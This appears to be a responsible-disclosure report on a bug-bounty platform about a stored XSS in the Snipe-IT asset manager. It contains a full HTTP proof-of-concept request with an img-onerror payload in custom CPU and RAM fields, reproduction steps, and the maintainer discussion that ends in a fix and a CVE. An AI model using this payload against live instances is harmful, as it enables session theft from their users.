Cross-site Scripting (XSS) - Stored in snipe/snipe-it

Valid

Reported on

Nov 11th 2021


Description

Multiple Stored XSS at '_snipeit_ram_3' and '_snipeit_cpu_4' in the multipart message of POST request when creating a new Asset or editing an existed Asset.

Proof of Concept

POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=eyJpdiI6IklFZkVHc0JNU04rMzhIWThVdUR1SHc9PSIsInZhbHVlIjoiZlQxOTZXS3NuUGFBZlpKaUNuMGJlS2NuSjdpSm1yNmR3cXdpd3B4VkR5WFo5WlRtVmJoTll2U0JHbDQ1dVRHSlE5NGhnMGRqV3Z1ZTFNVGszUXZIMy9iVHNZQUdJdlhXbmt6OE9BdjdLMVFQMXJZQXVROE1YdTZHZC85MzJZcnhrWG1ya1BKL0pUVXpSS2Jhd0VRMXRvQXpPUkIrVXcvREQvdWwyYWlwQk9VRW1IRzdYcWZTOW1xRVM5RkFmZ0xPQit3QUVYVEpWOXhIa0l2cytmWUZ2a29sdGNxdHFWTGpSYzdGTGNLamQ3aFNiNXRMRlF6VTJBMlpLMEFWV1FCcUxTaW5SakRYc0VYYXRSMEtGNk5NVzRBNkMvV0lSanJoS1lja0lnMFZpbHhqK2NPNW1QckFtczhUcDhMYmd4L1MiLCJtYWMiOiIxYjg1MmQxZWJkOGU2MjU5MzQxZWFhMDNhYmMxMWUzNzJiYjYxOTk4ZmQyNmU1YzZiMWFhNDNiY2EyZTFkNTgyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D

------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"

KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"

PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"

8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"

"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"

"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"

00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"

1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"

user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"

abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS--

Steps to Reproduce

  • After login, in the dashboard, click on the Create New -> Asset on the top right corner to create a new asset
  • Fill in the required information in all fields in the Create Asset page
  • In the Model field, select a model which has the RAM and CPU fields that appear.
  • In the RAM and CPU fields, input the payload "><img src=x onerror=alert(1);>
  • Click Save button
  • In the left menu bar, click List All in Assets section to go to All Assets page
  • Search for the name of the asset that you created above, an XSS popup will display

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

PoC Video: PoC

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 23 days ago
Chau Minh Khanh modified their report
23 days ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 22 days ago
We have sent a follow up to the snipe/snipe-it team. We will try again in 7 days. 19 days ago
snipe
19 days ago

Maintainer


Can you reproduce this on demo.snipeitapp.com, or only on develop? Develop is not intended for production use.

Chau Minh Khanh
18 days ago

Researcher


Hi @maintainer, On demo.snipeitapp.com, when creating a new Asset, after choosing a model, there are no RAM and CPU fields appear so that it cannot reproduce on the demo. As well as in List All assets page, there are no CPU and RAM columns.

So, the XSS vulnerability only exists on the development, which has the vulnerable fields (CPU and RAM).

Chau Minh Khanh
18 days ago

Researcher


I guess that maybe those fields are new features that you are experimenting in the develop demo. So, if you intend to implement them in the release production, you can keep an eye for a potential XSS vulnerability as I mentioned in this report.

Chau Minh Khanh
18 days ago

Researcher


Hi @maintainer, Can you mark this disclose as a valid one? At least it is still vulnerable on the dev branch. The next time when I check for the bugs, I will take care of the demo for the master branch.

snipe
18 days ago

Maintainer


You can create those features on the demo instance by going into Custom Fields and then associating them with a model, then creating an asset of that model type.

I don't really consider this bounty-worthy, since it's likely fixed on master already and would be resolved when master gets merged down into develop. (i.e. this looks like a duplicate to me of a bug that was fixed on master in the past few weeks.)

Chau Minh Khanh
18 days ago

Researcher


I have followed your instruction to create a new custom field and then I created a new asset with the XSS payload in that custom field, the XSS popup showed up. (Note that at this time I reproduced it on demo.snipeitapp.com, which is your master branch, you can check my new PoC here: PoC)

I also know that you have been noticed another XSS report a few weeks ago. However, the XSS vulnerability in that report exists in other functions. Furthermore, it requires user interaction to trigger the XSS. In contrast, the XSS popup in my report will be triggered whenever a user views the asset list with no further action required.

snipe validated this vulnerability 18 days ago
Chau Minh Khanh has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe
18 days ago

Maintainer


Thanks for the clarification - I can confirm this is reproducable on master

snipe confirmed that a fix has been merged on 7ce599 18 days ago
snipe has been awarded the fix bounty
Jamie Slome
15 days ago

Admin


CVE published! 🎊

Chau Minh Khanh
15 days ago

Researcher


Thank @admin a lot for my first CVE!

Jamie Slome
15 days ago

Admin


Great job! 👌

Chau Minh Khanh
14 days ago

Researcher


Hi @snipe, @admin, Can you credit my name (Chau Minh Khanh) in the vulnerability information on Snyk? (https://security.snyk.io/vuln/SNYK-PHP-SNIPESNIPEIT-1923007). Thanks a lot!

Jamie Slome
14 days ago

Admin


@khanhchauminh - as mentioned in a separate report, this page will be included in the CVE, which includes the credit 👌 👍

Jamie Slome
11 days ago

Admin


A bug in our system caused the fix bounty to be set to $11.88 post validation. I have reverted it to the correct value of $10.

Jamie Slome
11 days ago

Admin


Scratch the above ⬆️ ⬆️

Keeping the fix bounty at $11.88.